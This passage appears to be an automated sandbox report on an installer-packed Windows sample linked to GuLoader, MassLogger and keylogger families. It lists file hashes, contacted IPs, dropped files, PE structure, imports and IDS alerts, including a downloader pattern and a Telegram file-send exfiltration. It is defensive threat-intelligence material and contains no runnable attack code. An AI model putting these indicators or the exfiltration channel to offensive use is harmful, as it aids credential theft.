                                                                                        • 104.21.64.1
                                                                                        FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 104.21.64.1
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 104.21.64.1
                                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.64.1
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 149.154.167.220
                                                                                        s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                        • 149.154.167.220
                                                                                        6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 149.154.167.220
                                                                                        37f463bf4616ecd445d4a1937da06e19ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 142.250.181.238
                                                                                        • 142.250.185.193
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dllppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):363811
                                                                                                            Entropy (8bit):1.2512349423386382
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                            MD5:BFEA15C03AB295424981A73637A19491
                                                                                                            SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                            SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                            SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):54682
                                                                                                            Entropy (8bit):4.600452681909532
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:H/fkzniGiZdP67rzK21FpkUWPlLHv1AtVFWAelfx1WXVl8QO1WF:HE/fcU8BP4zWAIUXU6
                                                                                                            MD5:90B639DCC81998233C63FD5788661C84
                                                                                                            SHA1:33DA31F2E2D564717D235AE50988FB8431FB465F
                                                                                                            SHA-256:139EF02E2E13F995BB0458A55C728723FF2C7CA481D6815494364ECEFA8C102C
                                                                                                            SHA-512:88B9BE658E749B09336E98DA55C01462775E5574931F22000CC6AD10C0C6B9A9B1A8F1967C89F9BF5D3CF01097A3E90A8922825CEDF1DBF4DD965A3844641E3E
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:.....TTT.*..JJJ...TTT.....ZZZZ...uuu..M....ff............WW...........&.V........................;;.....t.xxx.....w.........1............................................RRR.............J..........................;.....f..U.l.{{.bbb.........//......tt....""...}..........00....S.....................WWW........................".......^..........yy.......$........................................j.................|.3..................+...................T.dd...A......v.??......lllll.jjj...............i..........4.....7........X...............................,....a.......OOOO.....................{{...>.........|.w.....2................N.cc.nnn...uuuu..................................||.tt.b....gg......f.......ZZZ.................'.....#..I......~~~~~~..pp......==.......p.........___.ccc..GGG...).QQ.............EEEE.....QQQ........4.///....!............888..........{{{{...'''..888..............t.....|......w............................Z.7....%%%%%...........................DD.......W.).......
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):322504
                                                                                                            Entropy (8bit):7.699061460387586
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:AgqFXi1RsVq1UDXwo/6uHXpUMLYITDlT6kAncw7qiq5Vo:ALXiYVqywrMftT6Xh
                                                                                                            MD5:633B3B5C4D4A9C1704140BE89D1D74EF
                                                                                                            SHA1:835A23926B61BB3B26CB4EA9DADF9B6526AC14F7
                                                                                                            SHA-256:72FB238B5E3597B29EA9766D2DC9EED47208540FDDD63B82AD445BBE7899C18D
                                                                                                            SHA-512:69AE59004B0F9727CD476E25FD8B7555AC240857C56DB27CE616F016367BAE22616C5C40F164896340D7C215560BC26E63B07F0D222B137A9ACBB0CE67D87D57
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:................!....wwwww......#..............}.........GG.tt.................................GG.......>..............................................|.......................`.--........//..0......\..ZZZZZ.......V.....((... ............7777777........$$$$.....1.....:..............................A..b..11.........................7........=..p.............................$.........s........II.F..-...................q..EE...jj./..444..............xx.......rr..R........V..........###........`......}...........................z....O..444...{...)...............rr.mm........y.....>>...........hh......##....hh.........,,......g......E.e.............................C....5....a.....fff..........'.......................2.......d................////.........Z......3...........''''............||||.//...................................................s.....,................................................k...................................JJ....8.MMMMMM....................................L........
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):56641
                                                                                                            Entropy (8bit):1.2318917163845036
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                            MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                            SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                            SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                            SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):345
                                                                                                            Entropy (8bit):4.241929841155785
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                            MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                            SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                            SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                            SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):210366
                                                                                                            Entropy (8bit):1.240975322465592
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                            MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                            SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                            SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                            SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                            Malicious:false
                                                                                                            Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):11776
                                                                                                            Entropy (8bit):5.655335921632966
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                            MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                            SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                            SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                            SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: ppISxhDcpF.exe, Detection: malicious, Browse
                                                                                                            • Filename: m0CZ8H4jfl.exe, Detection: malicious, Browse
                                                                                                            • Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe, Detection: malicious, Browse
                                                                                                            • Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse
                                                                                                            • Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                            • Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse
                                                                                                            • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                            • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                            • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                            • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1178
                                                                                                            Entropy (8bit):3.276421799437869
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:8wl0+sXU1e/tz0/CSL6/cBnwgXl341DEDeG41DEDpQ1olfW+kjcmAaFW0CNfBf4U:8FvWLrFPjPCizZMFWjqy
                                                                                                            MD5:DF5140E59115FC4E34050475B8C00DCC
                                                                                                            SHA1:4C1AD71F97C9285B44FF0C4EC07D26D89B3DA983
                                                                                                            SHA-256:DA98616213F4AEB00FBDF816C5D2C3AAF4481B7194D97328CB7F1F95362B9152
                                                                                                            SHA-512:CC8FB8E0DF850568E2CD301BBC8C7EC084BDB0C0E1836EA7F3F1F37770C0B21802E74DB47B717AB00FC8E49731365CD46481351450C66F822E8961C0B7692094
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.X.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.B.u.f.a.g.i.n.............}..........
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Entropy (8bit):7.962958887068319
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:FILHKLtCw0.exe
                                                                                                            File size:475'326 bytes
                                                                                                            MD5:a2c795a981ddc798d11ec6e3ade42301
                                                                                                            SHA1:e650b31efaf33eaf34f92fea24e56d130d91a1f9
                                                                                                            SHA256:12ba9e377bd0dd9470038a28d9c076d28bd8e4bc9c419148a7ae4c20b7a831ba
                                                                                                            SHA512:cd32d017a2953f3a9469a1f1d755b00a7a9fe3e41189097e75d3afebc575a10af41ad80cdda164da7563a2a88ccb9ce28851edaea4b14989f584996b464916e1
                                                                                                            SSDEEP:12288:I5AsEOYEZGb7d790c5Y3mXxhseRb4C7RMbqgIsgRwu7Jj1JK8s5FEeKH:ZYY103oxhJb4s4IsgRwu7Jj1Jiceu
                                                                                                            TLSH:D9A423802661C193E4A35F390C62AFF73AFBF31158186F5792989E842DB37C2C97B255
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                            Icon Hash:3d2e0f95332b3399
                                                                                                            Entrypoint:0x4032a0
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                            Instruction
                                                                                                            sub esp, 000002D4h
                                                                                                            push ebp
                                                                                                            push esi
                                                                                                            push 00000020h
                                                                                                            xor ebp, ebp
                                                                                                            pop esi
                                                                                                            mov dword ptr [esp+0Ch], ebp
                                                                                                            push 00008001h
                                                                                                            mov dword ptr [esp+0Ch], 0040A300h
                                                                                                            mov dword ptr [esp+18h], ebp
                                                                                                            call dword ptr [004080B0h]
                                                                                                            call dword ptr [004080ACh]
                                                                                                            cmp ax, 00000006h
                                                                                                            je 00007F6C68BA3023h
                                                                                                            push ebp
                                                                                                            call 00007F6C68BA6166h
                                                                                                            cmp eax, ebp
                                                                                                            je 00007F6C68BA3019h
                                                                                                            push 00000C00h
                                                                                                            call eax
                                                                                                            push ebx
                                                                                                            push edi
                                                                                                            push 0040A2F4h
                                                                                                            call 00007F6C68BA60E3h
                                                                                                            push 0040A2ECh
                                                                                                            call 00007F6C68BA60D9h
                                                                                                            push 0040A2E0h
                                                                                                            call 00007F6C68BA60CFh
                                                                                                            push 00000009h
                                                                                                            call 00007F6C68BA6134h
                                                                                                            push 00000007h
                                                                                                            call 00007F6C68BA612Dh
                                                                                                            mov dword ptr [00434F04h], eax
                                                                                                            call dword ptr [00408044h]
                                                                                                            push ebp
                                                                                                            call dword ptr [004082A8h]
                                                                                                            mov dword ptr [00434FB8h], eax
                                                                                                            push ebp
                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                            push 000002B4h
                                                                                                            push eax
                                                                                                            push ebp
                                                                                                            push 0042B228h
                                                                                                            call dword ptr [0040818Ch]
                                                                                                            push 0040A2C8h
                                                                                                            push 00433F00h
                                                                                                            call 00007F6C68BA5D1Ah
                                                                                                            call dword ptr [004080A8h]
                                                                                                            mov ebx, 0043F000h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            call 00007F6C68BA5D08h
                                                                                                            push ebp
                                                                                                            call dword ptr [00408178h]
                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                            RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                            RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                            RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                            RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                            RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                            RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                            RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                            RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-10T20:23:56.219592+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.559240142.250.181.238443TCP
                                                                                                            2025-01-10T20:24:02.515912+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.559242193.122.6.16880TCP
                                                                                                            2025-01-10T20:24:09.781628+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.559242193.122.6.16880TCP
                                                                                                            2025-01-10T20:24:10.431548+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.559244149.154.167.220443TCP
